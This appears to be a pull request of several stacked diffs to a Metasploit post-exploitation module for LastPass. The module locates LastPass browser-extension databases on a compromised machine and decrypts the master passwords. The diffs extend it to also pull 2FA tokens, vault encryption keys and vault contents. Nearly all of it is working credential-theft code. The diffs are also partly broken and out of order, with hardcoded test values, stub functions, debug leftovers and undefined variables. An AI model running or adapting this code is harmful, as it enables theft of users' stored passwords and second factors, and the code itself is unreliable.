### PR TITLE
Update the Lastpass creds module with new attack vectors

### DIFF
--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -42,28 +42,32 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    lastpass_data = {} #Contains all LastPass info
-
     print_status "Extracting credentials"
-    lastpass_data = extract_credentials(account_map)
+    extract_credentials(account_map)
 
     print_status "Extracting 2FA tokens"
-    localstorage_map = build_localstorage_map
-    lastpass_data = check_localstorage_for_2FA_token(localstorage_map, lastpass_data) unless localstorage_map.empty?
+    extract_2fa_tokens(account_map)
 
-    print_lastpass_data(lastpass_data)
+    print_status "Extracting encryption keys"
+    extract_keys(account_map)
+
+    print_status "Extracting vault and iterations"                           
+    extract_vault_and_iterations(account_map)
+
+    print_lastpass_data(account_map)
   end
 
 
-  # Returns a mapping of { Account => { Browser => paths } }
+  # Returns a mapping of lastpass accounts
   def build_account_map
     platform = session.platform
     profiles = user_profiles
-    found_dbs_map = {}
+    account_map = {}
 
     profiles.each do |user_profile|
       account = user_profile['UserName']
       browser_path_map = {}
+      localstorage_path_map = {}
 
       case platform
       when /win/
@@ -73,11 +77,22 @@ class Metasploit3 < Msf::Post
           'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
           'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
         }
+        localstorage_path_map = {
+          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
+          'Firefox' => "#{user_profile['LocalAppData']}\\LastPass",
+          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
+          'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
+        }
       when /unix|linux/
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
           'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox",
           'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0"
+        }
+        localstorage_path_map = {
+          'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
+          'Firefox' => "#{user_profile['LocalAppData']}/.lastpass",
+          'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage"
         }
       when /osx/
         browser_path_map = {
@@ -86,18 +101,30 @@ class Metasploit3 < Msf::Post
           'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
           'Safari' => "#{user_profile['AppData']}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
         }
+        localstorage_path_map = {
+          'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
+          'Firefox' => "#{user_profile['LocalAppData']}/LastPass",
+          'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
+          'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
+        }
       else
         print_error "Platform not recognized: #{platform}"
       end
 
-      found_dbs_map[account] = {}
+      account_map[account] = {}
       browser_path_map.each_pair do |browser, path|
+        account_map[account][browser] = {}
         db_paths = find_db_paths(path, browser, account)
-        found_dbs_map[account][browser] = db_paths unless db_paths.empty?
+        if db_paths && db_paths.size > 0
+          account_map[account][browser]['lp_db_path'] = db_paths
+          account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser == 'Firefox'
+        else
+          account_map[account].delete(browser)
+        end
       end
     end
 
-    found_dbs_map
+    account_map
   end
 
   # Returns a list of DB paths found in the victims' machine
@@ -251,26 +278,18 @@ class Metasploit3 < Msf::Post
     begin
       decrypted_password = decipher.update(Base64.decode64(encrypted_password)) + decipher.final
     rescue
-      print_error "Password for #{email} could not be decrypted"
+      vprint_error "Password for #{email} could not be decrypted"
     end
 
     decrypted_password
   end
 
-
-
-
-
-
-
   def extract_credentials(account_map)
-    credentials = account_map # All credentials to be decrypted
-    
     account_map.each_pair do |account, browser_map|
       browser_map.each_pair do |browser, paths|
-        credentials[account][browser] = Hash.new # Get rid of the browser paths
+        account_map[account][browser]['lp_creds'] = {}
         if browser == 'Firefox'
-          paths.each do |path|
+          paths['lp_db_path'].each do |path|
             data = read_file(path)
             loot_path = store_loot(
               'firefox.preferences',
@@ -285,6 +304,7 @@ class Metasploit3 < Msf::Post
             ffcreds = firefox_credentials(loot_path)
             unless ffcreds.blank?
               ffcreds.each do |creds|
+                creds[1].blank? ? creds[1] = "NOT_FOUND" : creds[1] = clear_text_password(URI.unescape(creds[0]), URI.unescape(creds[1])) #Decrypt credentials
                 credentials[account][browser][URI.unescape(creds[0])] = [URI.unescape(creds[1])]
               end
             else
@@ -293,7 +313,7 @@ class Metasploit3 < Msf::Post
 
           end
         else # Chrome, Safari and Opera
-          paths.each do |path|
+          paths['lp_db_path'].each do |path|
             data = read_file(path)
             loot_path = store_loot(
               "#{browser.downcase}.lastpass.database",
@@ -303,6 +323,7 @@ class Metasploit3 < Msf::Post
               nil,
               "#{account}'s #{browser} LastPass database #{path}"
             )
+            account_map[account][browser]['lp_db_loot'] = loot_path
 
             # Parsing/Querying the DB
             db = SQLite3::Database.new(loot_path)
@@ -314,70 +335,23 @@ class Metasploit3 < Msf::Post
             for row in result
               if row[0]
                 row[1].blank? ? row[1] = "NOT_FOUND" : row[1] = clear_text_password(row[0], row[1]) #Decrypt credentials
-                credentials[account][browser][row[0]] = [row[1]]
+                account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]}
               end
             end
           end
         end
       end
     end
-
-    credentials
-  end
-
-
-  # Returns a localstorage mapping of { Account => { Browser => paths } }
-  def build_localstorage_map
-    platform = session.platform
-    profiles = user_profiles
-    found_localstorage_map = {}
-
-    profiles.each do |user_profile|
-      account = user_profile['UserName']
-      browser_path_map = {}
-
-      case platform
-      when /win/
-        browser_path_map = {
-          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
-          'Firefox' => "#{user_profile['LocalAppData']}\\LastPass",
-          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
-          'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
-        }
-      when /unix|linux/
-        browser_path_map = {
-          'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
-          'Firefox' => "#{user_profile['LocalAppData']}/.lastpass",
-          'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage"
-        }
-      when /osx/
-        browser_path_map = {
-          'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
-          'Firefox' => "#{user_profile['LocalAppData']}/LastPass",
-          'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
-          'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
-        }
-      else
-        print_error "Platform not recognized: #{platform}"
-      end
-
-      found_localstorage_map[account] = {}
-      browser_path_map.each_pair do |browser, path|
-        found_localstorage_map[account][browser] = path if client.fs.file.exists?(path)
-      end
-    end
-
-    found_localstorage_map
   end
 
 
   #Extracts the 2FA token from localStorage
-  def check_localstorage_for_2FA_token(localstorage_map, lastpass_data)
-    localstorage_map.each_pair do |account, browser_map|
-      browser_map.each_pair do |browser, path|
+  def extract_2fa_tokens(account_map)
+    account_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, lp_data|
         if browser == 'Firefox'
-          lastpass_data[account][browser].each_pair do |username, data|
-            path = path + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp"
+          lastpass_data[account][browser].each_pair do |username, user_data|
+            path = path + client.fs.file.separator + "lp.suid"
             data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
             data = "DECRYPTION_ERROR" if (data.blank? || data.size != 32) # Verify content
             loot_path = store_loot(
@@ -389,17 +363,18 @@ class Metasploit3 < Msf::Post
               "Firefox 2FA token file #{path}"
             )
             lastpass_data[account][browser][username] << data
+
           end
           
         else # Chrome, Safari and Opera
-          data = read_file(path)
+          data = read_file(lp_data['localstorage_db'])
           loot_path = store_loot(
             "#{browser.downcase}.lastpass.localstorage",
             'application/x-sqlite3',
             session,
             data,
             nil,
-            "#{account}'s #{browser} LastPass localstorage #{path}"
+            "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}"
           )
 
           # Parsing/Querying the DB
@@ -409,37 +384,33 @@ class Metasploit3 < Msf::Post
             "WHERE key = 'lp.uid';"
           ).flatten
 
-          lastpass_data[account][browser].each_pair do |username, data|
-            token.blank? ? lastpass_data[account][browser][username] << "NOT_FOUND" : lastpass_data[account][browser][username] << token.pack('H*')
-          end
+          token.blank? ? account_map[account][browser]['lp_2fa'] = "NOT_FOUND" : account_map[account][browser]['lp_2fa'] = token.pack('H*')
         end
       end
     end
-
-    lastpass_data
   end
 
 
   #Print all extracted LastPass data
-  def print_lastpass_data(lastpass_data)
+  def print_lastpass_data(account_map)
     lastpass_data_table = Rex::Ui::Text::Table.new(
       'Header' => "LastPass data",
       'Indent' => 1,
-      'Columns' => %w(Account Browser LastPass_Username LastPass_Password, LastPass_2FA)
+      'Columns' => %w(Account Browser LP_Username LP_Password LP_2FA LP_Key)
     )
 
-    lastpass_data.each_pair do |account, browser_map|
-      browser_map.each_pair do |browser, username_map|
-        username_map.each_pair do |user, data|
-          lastpass_data_table << [account, browser, user] + data
+    account_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, lp_data|
+        lp_data['lp_creds'].each_pair do |username, user_data|
+          lastpass_data_table << [account, browser, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']]
         end
       end
     end
 
-    unless lastpass_data.empty?
+    unless account_map.empty?
       print_good lastpass_data_table.to_s
       path = store_loot(
-        "lastpass.creds",
+        "lastpass.data",
         "text/csv",
         session,
         lastpass_data_table.to_csv,
@@ -447,7 +418,173 @@ class Metasploit3 < Msf::Post
         "LastPass Data"
       )
     end
+  end
+
+
+  def extract_vault_and_iterations(account_map)
+    account_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, lp_data|
+        lp_data['lp_creds'].each_pair do |username, user_data|
+          if browser == 'Firefox'
+            path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr"
+            data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
+            data = "NOT FOUND" if data.blank? # Verify content
+            lastpass_data[account][browser][username] << data
+
+          else # Chrome, Safari and Opera
+            db = SQLite3::Database.new(lp_data['lp_db_loot'])
+            result = db.execute(
+              "SELECT data FROM LastPassData " \
+              "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'accts'"
+            )
+
+            if result.size == 1 && !result[0].blank?
+              if  /iterations=(?<iterations>.*);(?<vault>.*)/ =~ result[0][0]
+                lp_data['lp_creds'][username]['iterations'] = iterations
+                loot_path = store_loot(
+                  "#{browser.downcase}.lastpass.vault",
+                  'text/plain',
+                  session,
+                  vault,
+                  nil,
+                  "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}"
+                )
+                lp_data['lp_creds'][username]['vault_loot'] = loot_path
+              else
+                lp_data['lp_creds'][username]['iterations'] = 1
+                loot_path = store_loot(
+                  "#{browser.downcase}.lastpass.vault",
+                  'text/plain',
+                  session,
+                  result[0][0],
+                  nil,
+                  "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}"
+                )
+                lp_data['lp_creds'][username]['vault_loot'] = loot_path
+              end
+            else
+              lp_data['lp_creds'][username]['iterations'] = "NOT_FOUND"
+              lp_data['lp_creds'][username]['vault_loot'] = "NOT_FOUND"
+            end
+          end
+        end
+      end
+    end
+  end
+
+
+
+
+  def extract_keys(account_map)
+    account_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, lp_data|
+        lp_data['lp_creds'].each_pair do |username, user_data|
+          otp, encrypted_key = extract_otp_and_encrypted_key(account, browser, username, lp_data['lp_db_loot'])
+          #otp_token = OpenSSL::Digest::SHA256.hexdigest( OpenSSL::Digest::SHA256.hexdigest( username + otp ) + otp )
+          otp = "7b88275911a8efc3efe50a3bda6ac202"
+          otpbin = [otp].pack "H*"
+          otp_token = lastpass_sha256( lastpass_sha256( username + otpbin ) + otpbin )
+          lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key(username, otp_token, encrypted_key)
+
+
+        end
+      end
+    end
+  end
+
+
+  # Returns otp, encrypted_key
+  def extract_otp_and_encrypted_key(account, browser, username, path)    
+    if browser == 'Firefox'
+      path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp"
+      otp = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
+      otp = "NOT FOUND" if otp.blank? # Verify content
+
+      path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps"
+      encrypted_key = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
+      encrypted_key = "NOT FOUND" if encrypted_key.blank? # Verify content
+      data = encrypted_key.split("\r")[0]
+      return [otp, encrypted_key] 
+    else # Chrome, Safari and Opera
+      db = SQLite3::Database.new(path)
+      result = db.execute(
+        "SELECT type, data FROM LastPassData " \
+        "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type IN ('otp', 'key')"
+      )
+
+      if result.size == 2
+        if result[0][0] == "otp"
+          return result[0][1], result[1][1] 
+        else 
+          return result[1][1], result[0][1] 
+        end
+      end
+
+      return "", ""
+    end
+  end
+
+
+  def decrypt_vault_key(username, token, encrypted_key)
+    return "adecryptionkey"
 
   end
+
+
+  # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary)
+  def lastpass_sha256(input)
+    output = ""
+
+    input.split("").each do |char|
+      digit = char.ord
+      if (digit <= 128)
+        output += digit.chr
+      else
+        output += (digit >> 6 | 192).chr
+        output += (digit >> 6 & 63 | 128).chr
+        output += (digit & 63 | 128).chr
+      end
+    end
+
+    #Nasty hack to switch Windows /r/n for /n
+    output = output.delete 130.chr+131.chr
+    output << 130.chr
+
+    return OpenSSL::Digest::SHA256.hexdigest(output)
+  end
+
+
+  def lastpass_sha256_test(input)
+    input = "7b88275911a8efc3efe50a3bda6ac202"
+    input = [input].pack "H*"
+    output = ""
+    #inputbin = [input].pack "H*"
+    puts input
+    input.split("").each do |char|
+      digit = char.ord
+      if (digit <= 128)
+        output += digit.chr
+      else
+        output += (digit >> 6 | 192).chr
+        output += (digit >> 6 & 63 | 128).chr
+        output += (digit & 63 | 128).chr
+      end
+      
+    end
+
+    input.split("").each do |char|
+      puts char.ord
+    end
+    puts OpenSSL::Digest::SHA256.hexdigest(output)
+    #return
+
+    #Nasty hack to switch Windows /r/n for /n
+    #output = output.delete 130.chr+131.chr
+    #output << 130.chr
+
+    return OpenSSL::Digest::SHA256.hexdigest(output)
+  end
+
+
 
 end

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -42,92 +42,39 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    print_status "Extracting credentials from #{account_map.size} LastPass databases"
+    lastpass_data = {} #Contains all LastPass info
 
-    # an array of [user, encrypted password, browser]
-    credentials = [] # All credentials to be decrypted
-    account_map.each_pair do |account, browser_map|
-      browser_map.each_pair do |browser, paths|
-        if browser == 'Firefox'
-          paths.each do |path|
-            data = read_file(path)
-            loot_path = store_loot(
-              'firefox.preferences',
-              'text/javascript',
-              session,
-              data,
-              nil,
-              "Firefox preferences file #{path}"
-            )
+    print_status "Extracting credentials"
+    lastpass_data = extract_credentials(account_map)
 
-            # Extract usernames and passwords from preference file
-            firefox_credentials(loot_path).each do |creds|
-              credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])]
-            end
-          end
-        else # Chrome, Safari and Opera
-          paths.each do |path|
-            data = read_file(path)
-            loot_path = store_loot(
-              "#{browser.downcase}.lastpass.database",
-              'application/x-sqlite3',
-              session,
-              data,
-              nil,
-              "#{account}'s #{browser} LastPass database #{path}"
-            )
-
-            # Parsing/Querying the DB
-            db = SQLite3::Database.new(loot_path)
-            lastpass_user, lastpass_pass = db.execute(
-              "SELECT username, password FROM LastPassSavedLogins2 " \
-              "WHERE username IS NOT NULL AND username != '' " \
-              "AND password IS NOT NULL AND password != '';"
-            ).flatten
-            if lastpass_user && lastpass_pass
-              credentials << [account, browser, lastpass_user, lastpass_pass]
+    print_status "Extracting 2FA tokens"
+    localstorage_map = build_localstorage_map
+    if localstorage_map.empty?
+      print_status "No LastPass localstorage found"
+    else
+      twoFA_token_map = check_localstorage_for_2FA_token(localstorage_map)
+      lastpass_data.each_pair do |account, browser_map|
+        browser_map.each_pair do |browser, username_map|
+          username_map.each_pair do |user, data|
+            if twoFA_token_map[account][browser]
+              lastpass_data[account][browser][user] << "defverthbertvwervrfv"#twoFA_token_map[account][browser]
+            else
+              lastpass_data[account][browser][user] << "NOT_FOUND"
             end
           end
         end
       end
     end
 
-    credentials_table = Rex::Ui::Text::Table.new(
-      'Header' => "LastPass credentials",
-      'Indent' => 1,
-      'Columns' => %w(Account Browser LastPass_Username LastPass_Password)
-    )
-    # Parse and decrypt credentials
-    credentials.each do |row| # Decrypt passwords
-      account, browser, user, enc_pass = row
-      vprint_status "Decrypting password for #{account}'s #{user} from #{browser}"
-      password = clear_text_password(user, enc_pass)
-      credentials_table << [account, browser, user, password]
-    end
-    unless credentials.empty?
-      print_good credentials_table.to_s
-      path = store_loot(
-        "lastpass.creds",
-        "text/csv",
-        session,
-        credentials_table.to_csv,
-        nil,
-        "Decrypted LastPass Master Passwords"
-      )
-    end
+    print_lastpass_data(lastpass_data)
   end
+
 
   # Returns a mapping of { Account => { Browser => paths } }
   def build_account_map
     platform = session.platform
     profiles = user_profiles
     found_dbs_map = {}
-
-    if datastore['VERBOSE']
-      vprint_status "Found #{profiles.size} users: #{profiles.map { |p| p['UserName'] }.join(', ')}"
-    else
-      print_status "Found #{profiles.size} users"
-    end
 
     profiles.each do |user_profile|
       account = user_profile['UserName']
@@ -144,7 +91,8 @@ class Metasploit3 < Msf::Post
       when /unix|linux/
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
-          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox"
+          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox",
+          'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage"
         }
       when /osx/
         browser_path_map = {
@@ -231,7 +179,6 @@ class Metasploit3 < Msf::Post
         return found_dbs_paths
       end
     end
-
     files.each do |file_path|
       unless %w(. .. Shared).include?(file_path)
         found_dbs_paths.push([path, file_path].join(sep))
@@ -288,16 +235,18 @@ class Metasploit3 < Msf::Post
   def clear_text_password(email, encrypted_data)
     return if encrypted_data.blank?
 
+    decrypted_password = "DECRYPTION_ERROR"
+
     sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(email)
     sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin
 
-    if encrypted_data.include?("|") # Apply CBC
+    if encrypted_data.include?("|") # Use CBC
       decipher = OpenSSL::Cipher.new("AES-256-CBC")
       decipher.decrypt
       decipher.key = sha256_binary_email # The key is the emails hashed to SHA256 and converted to binary
       decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and |
       encrypted_password = encrypted_data[26..-1]
-    else # Apply ECB
+    else # Use ECB
       decipher = OpenSSL::Cipher.new("AES-256-ECB")
       decipher.decrypt
       decipher.key = sha256_binary_email
@@ -305,9 +254,200 @@ class Metasploit3 < Msf::Post
     end
 
     begin
-      decipher.update(Base64.decode64(encrypted_password)) + decipher.final
+      decrypted_password = decipher.update(Base64.decode64(encrypted_password)) + decipher.final
     rescue
       print_error "Password for #{email} could not be decrypted"
     end
+
+    decrypted_password
   end
+
+
+
+
+
+
+
+  def extract_credentials(account_map)
+    credentials = account_map # All credentials to be decrypted
+    
+    account_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, paths|
+        credentials[account][browser] = Hash.new # Get rid of the browser paths
+        if browser == 'Firefox'
+          paths.each do |path|
+            data = read_file(path)
+            loot_path = store_loot(
+              'firefox.preferences',
+              'text/javascript',
+              session,
+              data,
+              nil,
+              "Firefox preferences file #{path}"
+            )
+
+            # Extract usernames and passwords from preference file
+            ffcreds = firefox_credentials(loot_path)
+            unless ffcreds.blank?
+              ffcreds.each do |creds|
+                credentials[account][browser]={URI.unescape(creds[0]) => [URI.unescape(creds[1])]}
+              end
+            else
+              credentials[account].delete("Firefox")
+            end
+
+          end
+        else # Chrome, Safari and Opera
+          paths.each do |path|
+            data = read_file(path)
+            loot_path = store_loot(
+              "#{browser.downcase}.lastpass.database",
+              'application/x-sqlite3',
+              session,
+              data,
+              nil,
+              "#{account}'s #{browser} LastPass database #{path}"
+            )
+
+            # Parsing/Querying the DB
+            db = SQLite3::Database.new(loot_path)
+            result = db.execute(
+              "SELECT username, password FROM LastPassSavedLogins2 " \
+              "WHERE username IS NOT NULL AND username != '' " \
+            )
+
+            for row in result
+              if row[0]
+                row[1].blank? ? row[1] = "NOT_FOUND" : row[1] = clear_text_password(row[0], row[1]) #Decrypt credentials
+                credentials[account][browser][row[0]] = [row[1]]
+              end
+            end
+          end
+        end
+      end
+    end
+
+    credentials
+  end
+
+
+  # Returns a localstorage mapping of { Account => { Browser => paths } }
+  def build_localstorage_map
+    platform = session.platform
+    profiles = user_profiles
+    found_localstorage_map = {}
+
+    profiles.each do |user_profile|
+      account = user_profile['UserName']
+      browser_path_map = {}
+
+      case platform
+      when /win/
+        browser_path_map = {
+          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
+          'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles",
+          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
+          'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
+        }
+      when /unix|linux/
+        browser_path_map = {
+          'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
+          #'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox",
+          'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage"
+        }
+      when /osx/
+        browser_path_map = {
+          'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
+          #'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles",
+          'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
+          'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
+        }
+      else
+        print_error "Platform not recognized: #{platform}"
+      end
+
+      found_localstorage_map[account] = {}
+      browser_path_map.each_pair do |browser, path|
+        found_localstorage_map[account][browser] = path if client.fs.file.exists?(path)
+      end
+    end
+
+    found_localstorage_map
+  end
+
+
+  #Extracts the 2FA token from localStorage
+  def check_localstorage_for_2FA_token(localstorage_map)
+    localstorage_map.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, path|
+        if browser == 'Firefox'
+          data = read_file(path)
+          loot_path = store_loot(
+            'firefox.preferences',
+            'text/javascript',
+            session,
+            data,
+            nil,
+            "Firefox preferences file #{path}"
+          )
+
+          firefox_credentials(loot_path).each do |creds|
+            credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])]
+          end
+        else # Chrome, Safari and Opera
+          data = read_file(path)
+          loot_path = store_loot(
+            "#{browser.downcase}.lastpass.localstorage",
+            'application/x-sqlite3',
+            session,
+            data,
+            nil,
+            "#{account}'s #{browser} LastPass localstorage #{path}"
+          )
+
+          # Parsing/Querying the DB
+          db = SQLite3::Database.new(loot_path)
+          token = db.execute(
+            "SELECT hex(value) FROM ItemTable " \
+            "WHERE key = 'lp.uid';"
+          ).flatten
+            token.blank? ? localstorage_map[account][browser] = "NOT_FOUND" : localstorage_map[account][browser] = token.pack('H*')
+        end
+      end
+    end
+
+    localstorage_map
+  end
+
+
+  #Print all extracted LastPass data
+  def print_lastpass_data(lastpass_data)
+    lastpass_data_table = Rex::Ui::Text::Table.new(
+      'Header' => "LastPass data",
+      'Indent' => 1,
+      'Columns' => %w(Account Browser LastPass_Username LastPass_Password, LastPass_2FA)
+    )
+
+    lastpass_data.each_pair do |account, browser_map|
+      browser_map.each_pair do |browser, username_map|
+        username_map.each_pair do |user, data|
+          lastpass_data_table << [account, browser, user] + data
+        end
+      end
+    end
+
+    unless lastpass_data.empty?
+      print_good lastpass_data_table.to_s
+      path = store_loot(
+        "lastpass.creds",
+        "text/csv",
+        session,
+        lastpass_data_table.to_csv,
+        nil,
+        "LastPass Data"
+      )
+    end
+
+  end
+
 end

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -709,10 +709,6 @@ class Metasploit3 < Msf::Post
     labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"]
     vault_data = []
     for label in labels
-      #if chunk[pointer..pointer + 3].nil?
-      #  vprint_error "Vault account could not be parsed"
-      #  return nil
-      #end
       length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16)
       encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1]
       label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*")

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -134,7 +134,7 @@ class Metasploit3 < Msf::Post
         account_map[account][browser] = {}
         db_paths = find_db_paths(path, browser, account)
         if db_paths && db_paths.size > 0
-          account_map[account][browser]['lp_db_path'] = db_paths
+          account_map[account][browser]['lp_db_path'] = db_paths.first
           account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file_exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/)
           account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file_exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/)
           account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox')
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Post
     end
 
     vprint_good "Found #{paths.size} #{browser} databases for #{account}"
-    return paths.size > 0 ? paths.first : []
+    paths
   end
 
   # Returns the relevant information from user profiles

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post
       update_info(
         info,
         'Name' => 'LastPass Master Password Extractor',
-        'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords',
+        'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords, encryption keys, 2FA tokens and all the vault passwords',
         'License' => MSF_LICENSE,
         'Author' => [
           'Alberto Garcia Illera <agarciaillera[at]gmail.com>', # original module and research
@@ -49,11 +49,11 @@ class Metasploit3 < Msf::Post
     print_status "Extracting 2FA tokens"
     extract_2fa_tokens(account_map)
 
-    print_status "Extracting encryption keys"
-    extract_vault_keys(account_map)
-
     print_status "Extracting vault and iterations"                           
     extract_vault_and_iterations(account_map)
+
+    print_status "Extracting encryption keys"
+    extract_vault_keys(account_map)
